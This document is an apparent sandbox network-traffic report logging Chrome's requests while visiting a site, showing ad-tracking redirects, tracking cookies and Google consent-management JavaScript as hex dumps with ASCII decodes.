                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:39 UTC530INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:39 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 261
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          server: Kestrel
                                                                                                                                                                                                                                                                                                                                                                          location: https://pixel.onaudience.com/?partner=147&mapped=7d931d72-b6cd-40d8-9aaa-91033ac03d95&icm&gdpr=0&gdpr_consent=&cver
                                                                                                                                                                                                                                                                                                                                                                          set-cookie: TDID=7d931d72-b6cd-40d8-9aaa-91033ac03d95; expires=Tue, 14 Oct 2025 09:12:39 GMT; domain=.adsrvr.org; path=/; secure; samesite=none
                                                                                                                                                                                                                                                                                                                                                                          set-cookie: TDCPM=CAEYBSABKAIyCwjSn7LK4o62PRAFOAE.; expires=Tue, 14 Oct 2025 09:12:39 GMT; domain=.adsrvr.org; path=/; secure; samesite=none
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:39 UTC261INData Raw: 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 69 78 65 6c 2e 6f 6e 61 75 64 69 65 6e 63 65 2e 63 6f 6d 2f 3f 70 61 72 74 6e 65 72 3d 31 34 37 26 6d 61 70 70 65 64 3d 37 64 39 33 31 64 37 32 2d 62 36 63 64 2d 34 30 64 38 2d 39 61 61 61 2d 39 31 30 33 33 61 63 30 33 64 39 35 26 69 63 6d 26 67 64 70 72 3d 30 26 67 64 70 72 5f 63 6f 6e 73 65 6e 74 3d 26 63 76 65 72 22 3e 68 74 74 70 73 3a 2f 2f 70 69 78 65 6c 2e 6f 6e 61 75 64 69 65 6e 63 65 2e 63 6f 6d 2f 3f 70 61 72 74 6e 65 72 3d 31 34 37 26 6d 61 70 70 65 64 3d 37 64 39 33 31 64 37 32 2d 62 36 63 64 2d 34 30 64 38 2d 39 61 61 61 2d 39 31 30 33 33 61 63 30 33 64 39 35 26 69 63 6d 26 67 64 70 72 3d 30 26 67 64 70 72 5f 63 6f 6e 73 65 6e 74 3d 26 63 76
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: Redirecting to: <a href="https://pixel.onaudience.com/?partner=147&mapped=7d931d72-b6cd-40d8-9aaa-91033ac03d95&icm&gdpr=0&gdpr_consent=&cver">https://pixel.onaudience.com/?partner=147&mapped=7d931d72-b6cd-40d8-9aaa-91033ac03d95&icm&gdpr=0&gdpr_consent=&cv


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          90192.168.2.749839142.250.185.1424432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:39 UTC502OUTGET /i/ca-pub-2542884292174911?href=https%3A%2F%2Fald.my.id&ers=2 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: fundingchoicesmessages.google.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:39 UTC1956INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                          Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:39 GMT
                                                                                                                                                                                                                                                                                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                                                                                                                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-fupjTeHy7aJ8TTQvZw3PpQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/ContributorServingWebSwitchboardHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                                                                                                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/ContributorServingWebSwitchboardHttp/cspreport/allowlist
                                                                                                                                                                                                                                                                                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/ContributorServingWebSwitchboardHttp/cspreport
                                                                                                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                                                                                          reporting-endpoints: default="/_/ContributorServingWebSwitchboardHttp/web-reports?context=eJzjqtDikmLw0pBiOO90h-k6EEt8fcmkBcRO6TNYQ4C49eY51ulAnPTvPGsJELtrXWT1B2JDhUuszkDsWHSJ1ROIVXsusZoD8f11l1ifA_HXPZdY_wLx3o-XWI8CcZHEFdYWIL7ddIX1MRAL8XC0H9y8g03gxup5vUxKGkn5hfHJ-XklRZlJpSX5RWnJaanFqUVlqUXxRgZGJoYGBpZ6BkbxBQYAPRFKPQ"
                                                                                                                                                                                                                                                                                                                                                                          Server: ESF
                                                                                                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:39 UTC1956INData Raw: 36 66 30 64 0d 0a 69 66 20 28 74 79 70 65 6f 66 20 5f 5f 67 6f 6f 67 6c 65 66 63 20 3d 3d 3d 20 27 75 6e 64 65 66 69 6e 65 64 27 20 7c 7c 20 74 79 70 65 6f 66 20 5f 5f 67 6f 6f 67 6c 65 66 63 2e 66 63 4b 65 72 6e 65 6c 4d 61 6e 61 67 65 72 20 3d 3d 3d 20 27 75 6e 64 65 66 69 6e 65 64 27 29 20 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 68 69 73 2e 64 65 66 61 75 6c 74 5f 43 6f 6e 74 72 69 62 75 74 6f 72 53 65 72 76 69 6e 67 52 65 73 70 6f 6e 73 65 43 6c 69 65 6e 74 4a 73 3d 74 68 69 73 2e 64 65 66 61 75 6c 74 5f 43 6f 6e 74 72 69 62 75 74 6f 72 53 65 72 76 69 6e 67 52 65 73 70 6f 6e 73 65 43 6c 69 65 6e 74 4a 73 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 74 72 79 7b 0a 5f 2e 5f 46 5f 74 6f 67
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 6f0dif (typeof __googlefc === 'undefined' || typeof __googlefc.fcKernelManager === 'undefined') {"use strict";this.default_ContributorServingResponseClientJs=this.default_ContributorServingResponseClientJs||{};(function(_){var window=this;try{_._F_tog
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:39 UTC1956INData Raw: 66 61 28 62 61 28 74 68 69 73 29 29 7d 7d 29 7d 72 65 74 75 72 6e 20 61 7d 29 3b 66 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 7b 6e 65 78 74 3a 61 7d 3b 61 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 72 65 74 75 72 6e 20 61 7d 3b 0a 5f 2e 71 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 26 26 61 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3b 69 66 28 62 29 72 65 74 75 72 6e 20 62 2e 63 61 6c 6c 28 61 29 3b 69 66 28 74 79 70 65 6f 66 20 61 2e 6c 65 6e 67 74 68 3d 3d 22 6e 75 6d 62 65 72 22 29 72 65 74 75 72 6e 7b 6e 65 78 74
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: fa(ba(this))}})}return a});fa=function(a){a={next:a};a[Symbol.iterator]=function(){return this};return a};_.q=function(a){var b=typeof Symbol!="undefined"&&Symbol.iterator&&a[Symbol.iterator];if(b)return b.call(a);if(typeof a.length=="number")return{next
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:39 UTC1956INData Raw: 68 28 74 79 70 65 6f 66 20 67 29 7b 63 61 73 65 20 22 6f 62 6a 65 63 74 22 3a 76 61 72 20 68 3d 67 21 3d 6e 75 6c 6c 3b 62 72 65 61 6b 20 61 3b 63 61 73 65 20 22 66 75 6e 63 74 69 6f 6e 22 3a 68 3d 21 30 3b 62 72 65 61 6b 20 61 3b 64 65 66 61 75 6c 74 3a 68 3d 21 31 7d 68 3f 74 68 69 73 2e 4b 28 67 29 3a 74 68 69 73 2e 41 28 67 29 7d 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 4b 3d 0a 66 75 6e 63 74 69 6f 6e 28 67 29 7b 76 61 72 20 68 3d 76 6f 69 64 20 30 3b 74 72 79 7b 68 3d 67 2e 74 68 65 6e 7d 63 61 74 63 68 28 6b 29 7b 74 68 69 73 2e 75 28 6b 29 3b 72 65 74 75 72 6e 7d 74 79 70 65 6f 66 20 68 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 74 68 69 73 2e 6c 61 28 68 2c 67 29 3a 74 68 69 73 2e 41 28 67 29 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 75 3d 66 75 6e
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: h(typeof g){case "object":var h=g!=null;break a;case "function":h=!0;break a;default:h=!1}h?this.K(g):this.A(g)}};e.prototype.K=function(g){var h=void 0;try{h=g.then}catch(k){this.u(k);return}typeof h=="function"?this.la(h,g):this.A(g)};e.prototype.u=fun
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:39 UTC1956INData Raw: 75 6e 63 74 69 6f 6e 20 76 28 78 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 46 29 7b 42 5b 78 5d 3d 46 3b 41 2d 2d 3b 41 3d 3d 30 26 26 6d 28 42 29 7d 7d 76 61 72 20 42 3d 5b 5d 2c 41 3d 30 3b 64 6f 20 42 2e 70 75 73 68 28 76 6f 69 64 20 30 29 2c 41 2b 2b 2c 63 28 6b 2e 76 61 6c 75 65 29 2e 6d 62 28 76 28 42 2e 6c 65 6e 67 74 68 2d 31 29 2c 6e 29 2c 6b 3d 68 2e 6e 65 78 74 28 29 3b 77 68 69 6c 65 28 21 6b 2e 64 6f 6e 65 29 7d 29 7d 3b 72 65 74 75 72 6e 20 65 7d 29 3b 0a 76 61 72 20 72 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 61 3d 3d 6e 75 6c 6c 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 6b 60 22 2b 63 29 3b 69 66 28 62 20 69 6e 73 74 61 6e 63 65 6f 66 20 52 65 67 45 78 70 29 74 68 72 6f 77 20 6e 65
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: unction v(x){return function(F){B[x]=F;A--;A==0&&m(B)}}var B=[],A=0;do B.push(void 0),A++,c(k.value).mb(v(B.length-1),n),k=h.next();while(!k.done)})};return e});var ra=function(a,b,c){if(a==null)throw new TypeError("k`"+c);if(b instanceof RegExp)throw ne
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:39 UTC1956INData Raw: 72 6f 74 6f 74 79 70 65 2e 65 6e 74 72 69 65 73 7c 7c 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 73 65 61 6c 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 31 3b 74 72 79 7b 76 61 72 20 68 3d 4f 62 6a 65 63 74 2e 73 65 61 6c 28 7b 78 3a 34 7d 29 2c 6b 3d 6e 65 77 20 61 28 5f 2e 71 28 5b 5b 68 2c 22 73 22 5d 5d 29 29 3b 69 66 28 6b 2e 67 65 74 28 68 29 21 3d 22 73 22 7c 7c 6b 2e 73 69 7a 65 21 3d 31 7c 7c 6b 2e 67 65 74 28 7b 78 3a 34 7d 29 7c 7c 6b 2e 73 65 74 28 7b 78 3a 34 7d 2c 22 74 22 29 21 3d 6b 7c 7c 6b 2e 73 69 7a 65 21 3d 32 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 6d 3d 6b 2e 65 6e 74 72 69 65 73 28 29 2c 6e 3d 6d 2e 6e 65 78 74 28 29 3b 69 66 28 6e 2e 64 6f 6e 65 7c 7c 6e 2e 76 61 6c 75 65 5b 30 5d 21 3d 68 7c 7c 6e 2e 76 61 6c 75
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: rototype.entries||typeof Object.seal!="function")return!1;try{var h=Object.seal({x:4}),k=new a(_.q([[h,"s"]]));if(k.get(h)!="s"||k.size!=1||k.get({x:4})||k.set({x:4},"t")!=k||k.size!=2)return!1;var m=k.entries(),n=m.next();if(n.done||n.value[0]!=h||n.valu
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:39 UTC1956INData Raw: 2e 6e 65 78 74 2c 7b 64 6f 6e 65 3a 21 31 2c 76 61 6c 75 65 3a 6b 28 6d 29 7d 3b 6d 3d 6e 75 6c 6c 7d 72 65 74 75 72 6e 7b 64 6f 6e 65 3a 21 30 2c 76 61 6c 75 65 3a 76 6f 69 64 20 30 7d 7d 29 7d 2c 66 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 3d 7b 7d 3b 72 65 74 75 72 6e 20 68 2e 71 61 3d 68 2e 6e 65 78 74 3d 68 2e 68 65 61 64 3d 68 7d 2c 67 3d 30 3b 72 65 74 75 72 6e 20 63 7d 29 3b 0a 70 28 22 53 65 74 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 61 7c 7c 74 79 70 65 6f 66 20 61 21 3d 22 66 75 6e 63 74 69 6f 6e 22 7c 7c 21 61 2e 70 72 6f 74 6f 74 79 70 65 2e 65 6e 74 72 69 65 73 7c 7c 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 73 65 61 6c 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: .next,{done:!1,value:k(m)};m=null}return{done:!0,value:void 0}})},f=function(){var h={};return h.qa=h.next=h.head=h},g=0;return c});p("Set",function(a){if(function(){if(!a||typeof a!="function"||!a.prototype.entries||typeof Object.seal!="function")return
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:39 UTC1956INData Raw: 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 26 26 62 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3b 69 66 28 74 79 70 65 6f 66 20 66 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 7b 62 3d 66 2e 63 61 6c 6c 28 62 29 3b 66 6f 72 28 76 61 72 20 67 3d 30 3b 21 28 66 3d 62 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 3b 29 65 2e 70 75 73 68 28 63 2e 63 61 6c 6c 28 64 2c 66 2e 76 61 6c 75 65 2c 67 2b 2b 29 29 7d 65 6c 73 65 20 66 6f 72 28 66 3d 62 2e 6c 65 6e 67 74 68 2c 67 3d 30 3b 67 3c 66 3b 67 2b 2b 29 65 2e 70 75 73 68 28 63 2e 63 61 6c 6c 28 64 2c 62 5b 67 5d 2c 67 29 29 3b 72 65 74 75 72 6e 20 65 7d 7d 29 3b 70 28 22 4f 62 6a 65 63 74 2e 65 6e 74 72 69 65 73 22 2c 66 75 6e
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: =typeof Symbol!="undefined"&&Symbol.iterator&&b[Symbol.iterator];if(typeof f=="function"){b=f.call(b);for(var g=0;!(f=b.next()).done;)e.push(c.call(d,f.value,g++))}else for(f=b.length,g=0;g<f;g++)e.push(c.call(d,b[g],g));return e}});p("Object.entries",fun
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:39 UTC1956INData Raw: 7d 3b 70 28 22 49 6e 74 38 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 66 69 6c 6c 22 2c 74 61 29 3b 70 28 22 55 69 6e 74 38 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 66 69 6c 6c 22 2c 74 61 29 3b 70 28 22 55 69 6e 74 38 43 6c 61 6d 70 65 64 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 66 69 6c 6c 22 2c 74 61 29 3b 70 28 22 49 6e 74 31 36 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 66 69 6c 6c 22 2c 74 61 29 3b 70 28 22 55 69 6e 74 31 36 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 66 69 6c 6c 22 2c 74 61 29 3b 70 28 22 49 6e 74 33 32 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 66 69 6c 6c 22 2c 74 61 29 3b 0a 70 28 22 55 69 6e 74 33 32 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 66 69 6c 6c 22 2c 74 61 29 3b 70 28 22 46 6c 6f
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: };p("Int8Array.prototype.fill",ta);p("Uint8Array.prototype.fill",ta);p("Uint8ClampedArray.prototype.fill",ta);p("Int16Array.prototype.fill",ta);p("Uint16Array.prototype.fill",ta);p("Int32Array.prototype.fill",ta);p("Uint32Array.prototype.fill",ta);p("Flo
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:39 UTC1956INData Raw: 3d 2d 31 7d 3b 47 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 2e 44 61 3f 21 21 5f 2e 45 61 26 26 5f 2e 45 61 2e 62 72 61 6e 64 73 2e 6c 65 6e 67 74 68 3e 30 3a 21 31 7d 3b 0a 49 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 47 61 28 29 3f 46 61 28 22 43 68 72 6f 6d 69 75 6d 22 29 3a 28 5f 2e 74 28 22 43 68 72 6f 6d 65 22 29 7c 7c 5f 2e 74 28 22 43 72 69 4f 53 22 29 29 26 26 21 28 47 61 28 29 3f 30 3a 5f 2e 74 28 22 45 64 67 65 22 29 29 7c 7c 5f 2e 74 28 22 53 69 6c 6b 22 29 7d 3b 5f 2e 4b 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 4a 61 26 26 61 21 3d 6e 75 6c 6c 26 26 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 7d 3b 4d 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: =-1};Ga=function(){return _.Da?!!_.Ea&&_.Ea.brands.length>0:!1};Ia=function(){return Ga()?Fa("Chromium"):(_.t("Chrome")||_.t("CriOS"))&&!(Ga()?0:_.t("Edge"))||_.t("Silk")};_.Ka=function(a){return Ja&&a!=null&&a instanceof Uint8Array};Ma=function(){var a=
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:39 UTC1956INData Raw: 20 61 2e 74 6f 53 74 72 69 6e 67 28 29 2e 69 6e 64 65 78 4f 66 28 22 5b 6e 61 74 69 76 65 20 63 6f 64 65 5d 22 29 21 3d 3d 2d 31 3f 61 3a 6e 75 6c 6c 7d 63 61 74 63 68 28 62 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 7d 3b 78 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 76 62 3d 3d 3d 76 6f 69 64 20 30 29 7b 76 61 72 20 62 3d 6e 65 77 20 77 62 28 5b 5d 2c 7b 7d 29 3b 76 62 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6f 6e 63 61 74 2e 63 61 6c 6c 28 5b 5d 2c 62 29 2e 6c 65 6e 67 74 68 3d 3d 3d 31 7d 76 62 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 53 79 6d 62 6f 6c 2e 69 73 43 6f 6e 63 61 74 53 70 72 65 61 64 61 62 6c 65 26 26 28 61 5b 53 79 6d 62 6f 6c 2e 69 73 43 6f 6e 63 61 74 53 70 72 65 61
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: a.toString().indexOf("[native code]")!==-1?a:null}catch(b){return null}};xb=function(a){if(vb===void 0){var b=new wb([],{});vb=Array.prototype.concat.call([],b).length===1}vb&&typeof Symbol==="function"&&Symbol.isConcatSpreadable&&(a[Symbol.isConcatSprea


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          91192.168.2.749835142.250.185.1104432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:39 UTC829OUTPOST /el/AGSKWxVAzDHl_-4j7DcCm6sYAbWFlq_mBsm_FyV6OOGNZcwDj1f1wVJJMJDPrG-A9X0dMOs9_cpdPTFlXO6fLqszIBQTCWLwCy0Y8TKsIXcvGA8rLOoYiWyUoC1SpBcoK0frF33KE48rcg== HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: fundingchoicesmessages.google.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 247
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Origin: https://ald.my.id
                                                                                                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://ald.my.id/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:39 UTC247OUTData Raw: 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 31 37 32 38 38 39 37 31 35 37 35 35 39 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 30 2c 5b 6e 75 6c 6c 2c 5b 22 49 44 3d 65 31 35 65 39 37 32 38 33 65 30 62 33 66 62 34 3a 54 3d 31 37 32 38 38 39 37 31 35 36 3a 52 54 3d 31 37 32 38 38 39 37 31 35 36 3a 53 3d 41 4c 4e 49 5f 4d 59 52 4e 47 31 48 50 56 71 51 73 61 2d 34 75 74 57 41 55 45 38 76 4e 72 78 50 2d 41 22 5d 5d 5d
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: [null,null,null,null,null,null,null,null,1728897157559,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,0,[null,["ID=e15e97283e0b3fb4:T=1728897156:RT=1728897156:S=ALNI_MYRNG1HPVqQsa-4utWAUE8vNrxP-A"]]]
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:39 UTC1869INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: POST, GET, OPTIONS
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Max-Age: 86400
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: https://ald.my.id
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:39 GMT
                                                                                                                                                                                                                                                                                                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                                                                                                                                                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-xstQOMy5Wti8h_DPcJaaBQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/ContributorLoggingHttp/cspreport;worker-src 'self'
                                                                                                                                                                                                                                                                                                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/ContributorLoggingHttp/cspreport/allowlist
                                                                                                                                                                                                                                                                                                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/ContributorLoggingHttp/cspreport
                                                                                                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
